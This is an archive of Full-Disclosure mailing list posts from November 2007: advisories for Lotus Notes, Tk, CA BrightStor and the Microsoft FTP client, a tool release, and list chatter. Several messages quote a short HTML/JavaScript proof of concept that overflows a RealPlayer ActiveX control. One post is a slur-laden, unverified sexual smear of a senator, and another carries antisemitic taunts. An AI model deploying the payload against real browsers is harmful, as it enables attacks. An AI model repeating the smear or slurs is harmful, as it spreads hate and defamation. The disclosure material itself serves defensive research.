[Full-disclosure] Announce: RFIDIOt release RFIDIOt-0.1r, November 2007

[Adam Laurie]

Folks,

I'm please to bring you the latest update to RFIDIOt, the open source 
python library for RFID exploration...

This release is brought to you courtesy of United Airlines, who bumped 
me from my flight thereby condemning me to 8 hours in the largest, 
shiniest, emptiest and most soul-destroying lounge I've ever had the 
misfortune to set foot in... If ever there was motivation to lose 
yourself in python, this was it... :)

 From CHANGES:

   v0.r
   add SCM Microsystems reader support
   add -d (debug) option
   switch to T=1 protocol for PC/SC
   add auto-detect of PC/SC reader types
   fix minor reporting issues in readmifaresimple.py
   fix setting of tag type 'ALL' on ACG readers (different for LF or HF)
   added a bunch of PCSC ATR card types
   add reading of previously stored files to mrpkey.py
   fix CBEFF processing in mrpkey.py
   fix bruteforcing of first character in mrpkey.py [Petter Bjorklund]
   add ID Card processing to mrpkey.py [vonJeek mailto:[EMAIL PROTECTED]]

The main change is processing the Biometric block in e-passports, which 
should now work correctly for all nations, and adding ID cards (thanks 
to vonJeek)... Please let me know if you find any exceptions. ID cards 
have so far only been tested on NL cards.

Full details here:

   http://rfidiot.org

enjoy,
Adam
-- 
Adam Laurie Tel: +44 (0) 1304 814800
The Bunker Secure Hosting Ltd.  Fax: +44 (0) 1304 814899
Ash Radar Station
Marshborough Road
Sandwichmailto:[EMAIL PROTECTED]
Kent
CT13 0PL
UNITED KINGDOM  PGP key on keyservers

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Trent Lott

[Ned Bender]

Chester Trent Lott Sr. is  was a crappy Senator from Mississippi and a member 
of the Republican Party. He has served in numerous leadership positions, and is 
best known for gay sex with male prostitutes. 
On November 26 2007, Lott announced his intent to resign from his Senate seat 
by the end of 2007, in order to pursue something else in the private sector 
or to teach. The truth was he left because he was about to be exposed for being 
a complete faggot IRL [1]

Some male whore named Benjamin Nicholas alleged to have been involved with is 
the married Sen. Trent Lott, who unexpectedly announced his retirement. Lott is 
well-known to have been against a plethora of gay rights issues throughout his 
terms in Congress. He was also good friends with Sen. Larry Craig throughout 
his time in Congress. 
Nicholas didn’t want to go on the record to talk about his dealings with Lott, 
because, said Nicholas, “Trent is going through his fair share of scrutiny 
right now and I don’t want to add to it.” However, e-mail and other records 
confirm that the two have met on at least two occasions. “All I can say at this 
point is no comment,” Nicholas. “It’s the professional thing for me to do.” In 
a subsequent e-mail message, Nicholas confirmed that another publication is 
working on a story about a “possible relationship” between Lott and himself, 
but Nicholas also “politely declined” an interview for that story. “As I said 
before, Lott has quite a bit on his plate right now and I don’t really want to 
add fuel to the embers,” Nicholas explained. 
 HUSTLER MAGAZINE EDiot RESEARCH Hustler publisher Larry Flint posted the 
following cryptic message on his website:“Hustler magazine has received 
numerous inquiries regarding the involvement of Larry Flynt and Hustler in the 
resignation of Trent Lott. Senator Lott has been the target of an ongoing 
Hustler investigation for some time now, due to confidential information that 
we have received.”
http://www.encyclopediadramatica.com/Trent_Lott
 


   
-
Be a better pen pal. Text or chat with friends inside Yahoo! Mail. See how.___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CORE-2007-0821: Lotus Notes buffer overflow in the Lotus WorkSheet file processor

[Core Security Technologies Advisories]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Core Security Technologies – CoreLabs Advisory
http://www.coresecurity.com/corelabs

Lotus Notes buffer overflow in the Lotus WorkSheet file processor

*Advisory Information*
Title: Lotus Notes buffer overflow in the Lotus WorkSheet file processor
Advisory ID:  CORE-2007-0821
Advisory URL: http://www.coresecurity.com/index.php5?action=itemid=2008
Date published: 2007-11-27
Date of last update: 2007-11-27
Vendors contacted: IBM Corp.
Release mode: COORDINATED RELEASE

*Vulnerability Information*
Class: Input validation error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: N/A
CVE Name: N/A

*Vulnerability Description*

Lotus Notes is the integrated email, calendar, instant messenger, browser
and business collaboration application developed by IBM to work as a
desktop client in conjunction with IBM’s Lotus Domino server application.

The email functionality of Lotus Notes supports previewing and processing
file attachments in various formats. To preview and process files in the
Lotus Worksheet File format (WKS) used by Lotus 1-2-3 the email client
uses a library from a third-party software vendor (Autonomy’s Verity
KeyView SDK). Several buffer overflow vulnerabilities were found in the
third-party library used by Lotus Notes to process Lotus 1-2-3 file
attachments.

These vulnerabilities could allow attackers to remotely execute arbitrary
commands on vulnerable systems by attaching a specially crafted file that
triggers exploitation when unsuspecting users attempt to “View” the
attachment. Exploitation of these vulnerabilities requires user intervention.

Although these specific vulnerabilities exist on a third–party component
the problem is compound by the way Lotus Notes displays information about
attachments, making it easier to elicit unsuspecting assistance from the
users to exploit them.  Lotus Notes displays the file type and
corresponding icon based on the attached file’s extension rather than the
MIME Content-Type header in the email whereas the view functionality is
handled by the Verity KeyView component which processes the attachment
based on the file contents.  Exploitation of these vulnerabilities
requires end-user interaction but the discrepancy described above could
allow an attacker to send a malicious Lotus 1-2-3 file as an attachment
with a seemingly innocuous extension (for example,  .JPG or .GIF) that
more easily lure users into viewing it thus making it easier to succeed in
the exploitation attempt.

These vulnerabilities have been discovered and tested using Lotus Notes
and the Verity KeyView SDK components it uses but other applications that
use the Verity KeyView SDK may be also vulnerable.

*Vulnerable packages*

 - Lotus Notes version 7.x
 - Lotus Notes version 8.x (not confirmed by Core)
 - Lotus Notes version 6.5.6 (not confirmed by Core)
 - Other software packages using Verity KeyView SDK using vulnerable
versions of l123sr.dll

*Non-vulnerable packages*
 N/A

*Solution/Vendor Information/Workaround*

Lotus Notes customers should follow the instructions of the following
support Technote, which outlines the available options based on specific
versions of Lotus Notes:

http://www.ibm.com/support/docview.wss?rs=475uid=swg21285600

Workaround 1: Delete the keyview.ini file in the Notes program directory.
This disables ALL viewers. When a user clicks View (for any file), a
dialog box will display with the message Unable to locate the viewer
configuration file..

Workaround 2: Delete the problem file l123sr.dll file. When a user tries
to view the specific file type, a dialog box will display with the message
The viewer display window could not be initialized. All other file types
work without returning the error message.

Workaround 3: Comment out specific lines in keyview.ini for any references
to the problem file (l123sr.dll). To comment a line, you precede it with a
semi-colon (;). When a user tries to view the specific file type, a dialog
box will display with the message The viewer display window could not be
initialized. For example:
[KVWKBVE]
;81.2.0.5.0=l123sr.dll
;81.2.0.9.0=l123sr.dll

Workaround 4:  Filter inbound emails with attachments with potentially
malicious files.  Lotus 1-2-3 files are usually associated to MIME
Content-Type headers set to the following strings:
 application/lotus-1-2-3
 application/lotus123
 application/x-lotus123
 application/wks
 application/x-wks
 application/vnd.lotus-1-2-3
Note however that workaround #4 is a simply stop gap measure that could be
circumvented by relatively unsophisticated attackers.

*Credits*
This vulnerability was discovered by Sebastián Muñiz from the CORE IMPACT
Exploit Writers Team (EWT)

*Technical Description*

Lotus 1-2-3 and Lotus Symphony spreadsheet applications use the Worksheet
File format [1] to persist spreadsheet data on the file system. Lotus
Notes uses a third-party library [2] to process file attachments in the
Lotus Worksheet 

Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

[Elazar Broad]

Ouch is right.. I know I confused alot of people, I apologize for that. Anyhow, SecurityFocus moved the PlayerProperty() issue from 22811 to its own BID, http://www.securityfocus.com/bid/26586. I have been in contact with Symantec's DeepSight team, and it looks like the Import() function will still throw a stack overflow exception, however it does not appear to overwrite the EIP, making it a plain old DoS attack. I believe they plan to post a write-up on this.Elazar-Original Message-
From: James Matthews <[EMAIL PROTECTED]>
Sent: Nov 26, 2007 7:24 PM
To: Elazar Broad <[EMAIL PROTECTED]>
Cc: "full-disclosure@lists.grok.org.uk" 
Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

Ouch! On Nov 26, 2007 9:15 PM, Elazar Broad [EMAIL PROTECTED] wrote:
After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really http://www.securityfocus.com/bid/26130
, although I am not sure why Linux is listed under the "Vulnerable" section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer 
ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows:-!--written by e.b.--html
head script language="_javascript_" DEFER  function Check() {  var s = "";  while (s.length  99) s=s+s;   var obj = new ActiveXObject("
IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}   var obj2 = obj.PlayerProperty(s);  } /script/headbody 
/body/html-Elazar___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/-- 
http://www.goldwatches.com/coupons/http://www.jewelerslounge.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

[Joey Mengele]

Holy mother of Hitler will you shut the fuck up already. This is a 
stack overflow not a stack based buffer overflow. There are no 
security implications here. You are worse than Jewha Mati Laurio. 

Elazar, please do not post to this list again. Please leave the 
trolling to the professionals.

J

P.S. Sorry for the swear words John.

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
[EMAIL PROTECTED] wrote:
After some creative Googling, I am revising my original post. I 
believe that the Import() method overflow that I originally posted 
is really http://www.securityfocus.com/bid/26130, although I am 
not sure why Linux is listed under the Vulnerable section, so I 
am taking it out of the PoC code. Real claims to have patched this 
back in October, but I can still throw a stack overflow exception 
via this function using the originally stated version of 
RealPlayer(which I installed last night). I am now listing this 
vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX 
Control PlayerProperty() Method Stack Overflow, and it might be 
wise to list this under a separate BID. PoC as follows:

-
!--
written by e.b.
--
html
 head
  script language=JavaScript DEFER
function Check() {
var s = ;

while (s.length  99) s=s+s;

 var obj = new ActiveXObject(IERPCTL.IERPCTL); //{FDC7A535-
4070-4B92-A0EA-D9994BCC0DC5}
   
  var obj2 = obj.PlayerProperty(s);


   }
  /script

 /head
 body onload=JavaScript: return Check();

 /body
/html 
-

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--
Become a medical transcriptionist at home, at your own pace.
http://tagline.hushmail.com/fc/Ioyw6h4eKoY5QPbl6HF48RpgEtzySCfsQ404uXiPJLBOn00vA9ZmnG/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

[Joey Mengele]

LOLOLOLOL ok you win, client side denial of service warrants your 5 
electronic mail messages with up to the minute updates. I bet this 
one will be exploited in the wild!

Get a life LOLOL!

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
[EMAIL PROTECTED] wrote:
Stack Overflow - learn to read. A DoS attack still has some 
security implications...

-Original Message-
From: Joey Mengele [EMAIL PROTECTED]
Sent: Nov 27, 2007 1:05 AM
To: full-disclosure@lists.grok.org.uk, [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer 
ierpplug.dll ActiveX Control Multiple Stack Overflows

Holy mother of Hitler will you shut the fuck up already. This is 
a 
stack overflow not a stack based buffer overflow. There are 
no 
security implications here. You are worse than Jewha Mati Laurio. 


Elazar, please do not post to this list again. Please leave the 
trolling to the professionals.

J

P.S. Sorry for the swear words John.

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
[EMAIL PROTECTED] wrote:
After some creative Googling, I am revising my original post. I 
believe that the Import() method overflow that I originally 
posted 
is really http://www.securityfocus.com/bid/26130, although I am 
not sure why Linux is listed under the Vulnerable section, so 
I 
am taking it out of the PoC code. Real claims to have patched 
this 
back in October, but I can still throw a stack overflow 
exception 
via this function using the originally stated version of 
RealPlayer(which I installed last night). I am now listing this 
vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX 
Control PlayerProperty() Method Stack Overflow, and it might be 
wise to list this under a separate BID. PoC as follows:

-
!--
written by e.b.
--
html
 head
  script language=JavaScript DEFER
function Check() {
var s = ;

while (s.length  99) s=s+s;

 var obj = new ActiveXObject(IERPCTL.IERPCTL); //{FDC7A535-

4070-4B92-A0EA-D9994BCC0DC5}
   
  var obj2 = obj.PlayerProperty(s);


   }
  /script

 /head
 body onload=JavaScript: return Check();

 /body
/html 
-

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--
Click for your daily horoscope, learn about money, love  family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZBHl2sHpyjNjTLgy4OTny6jhrF
rqMryjXVt31vg2H7tNd/


--
Click for your daily horoscope, learn about money, love  family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZARVCeSZnQsflA3BGgTQlm8TvOc2Qh6Kh1tD32a9sgsa8/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Eee PC Security

[Matthew Hall]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Danny wrote:
 Has anyone had a go with/against the Asus Eee PC?

Yes. Open the file browser and get a terminal (/usr/bin/konsole will
do). Then just 'sudo su -' and you're root!
Every user gets ALL=(ALL) NOPASSWD: ALL in sudoers, so not much of a
challenge. Haven't tried any remote exploits, but was running a
(probably customised) 2.6.16 kernel (iirc) so is vulnerable to a couple
of things off the top of my head.

Matt

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iD8DBQFHTEyXw5xT5S6r89URAi7UAJsE7/ZIw4AiPMtwoyFFp+Pv05rS5wCghT+J
Gi7KBFmBiQo4aY4ehF9BcsE=
=biMR
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1416-1] New tk8.3 packages fix arbitrary code execution

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1416-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 27, 2007 http://www.debian.org/security/faq
- 

Package: tk8.3
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2007-5378

It was discovered that Tk, a cross-platform graphical toolkit for Tcl
performs insufficient input validation in the code used to load GIF
images, which may lead to the execution of arbitrary code.

For the stable distribution (etch), this problem has been fixed in
version 8.3.5-6etch1.

Due to the technical limitation in the Debian archive scripts the update
for the old stable distribution (sarge) cannot be released in sync with
the update for the stable distribution. It will be provided in the next
days.

We recommend that you upgrade your tk8.3 packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1.dsc
Size/MD5 checksum:  672 de719ed8329448b60a2aa5222d94b4c5
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1.diff.gz
Size/MD5 checksum:28583 de9d57ab9820f98f01a71cab78b9a51c
  http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5.orig.tar.gz
Size/MD5 checksum:  2598030 363a55d31d94e05159e9212074c68004

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-doc_8.3.5-6etch1_all.deb
Size/MD5 checksum:   656798 11b87b5e83e8adfa2e19dc93567c422f

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_alpha.deb
Size/MD5 checksum:   808264 05534d541c67856fd7df57bee0b7448f
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_alpha.deb
Size/MD5 checksum:   870224 c8f3c39de9dbdbe34afc0558653e97f2

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_amd64.deb
Size/MD5 checksum:   691340 3aa055a50b0c1864712cad543240cab6
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_amd64.deb
Size/MD5 checksum:   830790 50c07325658b74d25d06e239012da590

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_arm.deb
Size/MD5 checksum:   649782 33621a77aaf49894dc7962d7579ae2c3
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_arm.deb
Size/MD5 checksum:   802848 7619e44e0c07804307f3b3d59d97589a

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_hppa.deb
Size/MD5 checksum:   888990 d9eaf0227c0594236389bf877747744e
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_hppa.deb
Size/MD5 checksum:   773376 c06fc4983e04a409811c6b070a7d0b4a

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_i386.deb
Size/MD5 checksum:   670426 3bf93bae2527f043b01edb3018de4d90
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_i386.deb
Size/MD5 checksum:   803736 99d6c8562e60a2648817db63555fcbc1

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_ia64.deb
Size/MD5 checksum:  1057842 45e3159db424788b401d4a98c1dfb511
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_ia64.deb
Size/MD5 checksum:   959436 9cce282e61e257655301ad47ddc03ac1

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_mips.deb
Size/MD5 checksum:   824708 437a50b7cfd05d863b9a4a97b596969e
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_mips.deb
Size/MD5 checksum:   725262 8a50f4b098e50fec648ce187139f8af8

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_mipsel.deb
Size/MD5 checksum:   822976 3451e740c116b8fbf77c07e744624637
  

[Full-disclosure] [SECURITY] [DSA 1415-1] New tk8.4 packages fix arbitrary code execution

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1415-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 27, 2007 http://www.debian.org/security/faq
- 

Package: tk8.4
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2007-5378

It was discovered that Tk, a cross-platform graphical toolkit for Tcl
performs insufficient input validation in the code used to load GIF
images, which may lead to the execution of arbitrary code.

For the stable distribution (etch), this problem has been fixed in
version 8.4.12-1etch1.

For the old stable distribution (sarge), this problem has been fixed
in version 8.4.9-1sarge1.

We recommend that you upgrade your tk8.4 packages. Updated packages for
sparc will be provided later.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 3.1 (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1.diff.gz
Size/MD5 checksum:19132 8ded0a058cbe9140f905cbd769622d45
  http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9.orig.tar.gz
Size/MD5 checksum:  3266500 1b64258abaf258e9a86f331d8de17a71
  http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1.dsc
Size/MD5 checksum:  672 3a7de8981a9239e231c55486ee308de3

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-doc_8.4.9-1sarge1_all.deb
Size/MD5 checksum:   775182 df1628c1fadebdf2ce7d4ab138a0dcca

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_alpha.deb
Size/MD5 checksum:   940380 984e7d1787ea4bf5df7d05be8feaee31
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_alpha.deb
Size/MD5 checksum:  1031394 a68b8bd438ce30ad2899e893abbdf042

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_amd64.deb
Size/MD5 checksum:   976380 299c8fca87bdbe6a162edea32d44c38d
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_amd64.deb
Size/MD5 checksum:   810012 3b83261ac52a6a630958969f8b68f044

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_arm.deb
Size/MD5 checksum:   945218 6f016ddd99884ffb1a7fa636d5c157fd
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_arm.deb
Size/MD5 checksum:   823888 2c55586df75b8ce85b71f396aa511ce9

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_hppa.deb
Size/MD5 checksum:   912732 100772a425baf8736ac2e59e11a111e4
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_hppa.deb
Size/MD5 checksum:  1046506 ac02d6ea5b9249cfc8d8bd3f7905dd03

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_i386.deb
Size/MD5 checksum:   956128 8508b0b84a8a8887903ee61096c85c39
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_i386.deb
Size/MD5 checksum:   793304 9bc383580f29575f49035ec640595df4

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_ia64.deb
Size/MD5 checksum:  1053280 c1684368d5bbdc14919cb11ad26bc726
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_ia64.deb
Size/MD5 checksum:  1182358 2a0c99c93455876bf42867bc83620b00

m68k architecture (Motorola Mc680x0)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_m68k.deb
Size/MD5 checksum:   909088 ccece33fe08dc605e03044dad3a43661
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_m68k.deb
Size/MD5 checksum:   696326 0ab235f58988c18975e43089c3e10af0

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_mips.deb
Size/MD5 checksum:   836414 48299e087ae5dc67625b27d7f0854e32
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_mips.deb
Size/MD5 checksum:   974766 

Re: [Full-disclosure] Eee PC Security

[Michael Holstein]

 Has anyone had a go with/against the Asus Eee PC?
 


SANS did a write-up on this the other day :

http://isc.sans.org/diary.html?storyid=3687

.. and they include the steps required to disable the offending services.

~Mike.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Security Contact @ Avast!

[Sowhat]

Hi

Could anyone send me the security contact of avast! ?
[EMAIL PROTECTED] does not response.

Thanks

-- 
Sowhat
http://secway.org
Life is like a bug, Do you know how to exploit it ?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Expos

[cocoruder .]

it is so amazing that the vendor's advisory has been released more than one 
month ago, (see my advisory of a similar vul at 
http://ruder.cdut.net/blogview.asp?logID=221), and another thing is that I have 
tested my reported vul again after CA's patch released one month ago, but in 
fact they have not fixed it!! I report it again to CA but there is no response, 
I guess CA is making an international joke with us:), or because this product 
is so bad that they will not support it any more?
 
welcome to my blog:http://ruder.cdut.net
 
 From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk; [EMAIL 
 PROTECTED] Date: Mon, 26 Nov 2007 16:10:30 -0600 Subject: [Full-disclosure] 
 ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method 
 Exposure Vulnerability  ZDI-07-069: CA BrightStor ARCserve Backup Message 
 Engine Insecure Method  Exposure Vulnerability 
 http://www.zerodayinitiative.com/advisories/ZDI-07-069.html November 26, 
 2007  -- CVE ID: CVE-2007-5328  -- Affected Vendor: Computer 
 Associates  -- Affected Products: BrightStor ARCserve Backup r11.5 
 BrightStor ARCserve Backup r11.1 BrightStor ARCserve Backup r11.0 
 BrightStor Enterprise Backup r10.5 BrightStor ARCserve Backup v9.01  -- 
 TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have 
 been protected against this vulnerability by Digital Vaccine protection 
 filter ID 5144.  For further product information on the TippingPoint IPS:  
 http://www.tippingpoint.com   -- Vulnerabil
 ity Details: This vulnerability allows attackers to arbitrarily access and 
modify the file system and registry of vulnerable installations of Computer 
Associates BrightStor ARCserve Backup. Authentication is not required to 
exploit this vulnerability.  The specific flaws exists in the Message Engine 
RPC service which listens by default on TCP port 6504 with the following 
UUID:  506b1890-14c8-11d1-bbc3-00805fa6962e  The service exposes a number 
of insecure method calls including: 0x17F, 0x180, 0x181, 0x182, 0x183, 0x184, 
0x185, 0x186, 0x187, 0x188, 0x189, 0x18A, 0x18B, and 0x18C. Attackers can 
leverage these methods to manipulate both the file system and registry which 
can result in a complete system compromise.  -- Vendor Response: Computer 
Associates has issued an update to correct this vulnerability. More details 
can be found at:  
http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp  -- 
Disclosure Timeline: 2007.01.12 - Vulnerabi
 lity reported to vendor 2007.11.26 - Coordinated public release of advisory 
 -- Credit: This vulnerability was discovered by Tenable Network Security.  
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero 
Day Initiative (ZDI) represents  a best-of-breed model for rewarding security 
researchers for responsibly disclosing discovered vulnerabilities.  
Researchers interested in getting paid for their security research through the 
ZDI can find more information and sign-up at:  
http://www.zerodayinitiative.com  The ZDI is unique in how the acquired 
vulnerability information is used. 3Com does not re-sell the vulnerability 
details or any exploit code. Instead, upon notifying the affected product 
vendor, 3Com provides its customers with zero day protection through its 
intrusion prevention technology. Explicit details regarding the specifics of 
the vulnerability are not exposed to any parties until an official vendor 
patch is publicly av
 ailable. Furthermore, with the altruistic aim of helping to secure a broader 
user base, 3Com provides this vulnerability information confidentially to 
security vendors (including competitors) who have a vulnerability protection 
or mitigation product.  CONFIDENTIALITY NOTICE: This e-mail message, 
including any attachments, is being sent by 3Com for the sole use of the 
intended recipient(s) and may contain confidential, proprietary and/or 
privileged information. Any unauthorized review, use, disclosure and/or 
distribution by any  recipient is prohibited. If you are not the intended 
recipient, please delete and/or destroy all copies of this message regardless 
of form and any included attachments and notify 3Com immediately by contacting 
the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]  
___ Full-Disclosure - We believe 
in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted 
 and sponsored by Secunia - http://secunia.com/
_
用 Live Search 搜尽天下资讯！
http://www.live.com/?searchOnly=true___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

[Rajesh Sethumadhavan]

Microsoft FTP Client Multiple Bufferoverflow
Vulnerability

#

XDisclose Advisory  : XD100096
Vulnerability Discovered: November 20th 2007
Advisory Reported   : November 28th 2007
Credit  : Rajesh Sethumadhavan

Class   : Buffer Overflow
  Denial Of Service
Solution Status : Unpatched
Vendor  : Microsoft Corporation
Affected applications   : Microsoft FTP Client
Affected Platform   : Windows 2000 server
  Windows 2000 Professional
  Windows XP
  (Other Versions may be also effected)

#


Overview:
Bufferoverflow vulnerability is discovered in
microsoft ftp client. Attackers can crash the ftp
client of the victim user by tricking the user.


Description:
A remote attacker can craft packet with payload in the
mget, ls, dir, username and password
commands as demonstrated below. When victim execute
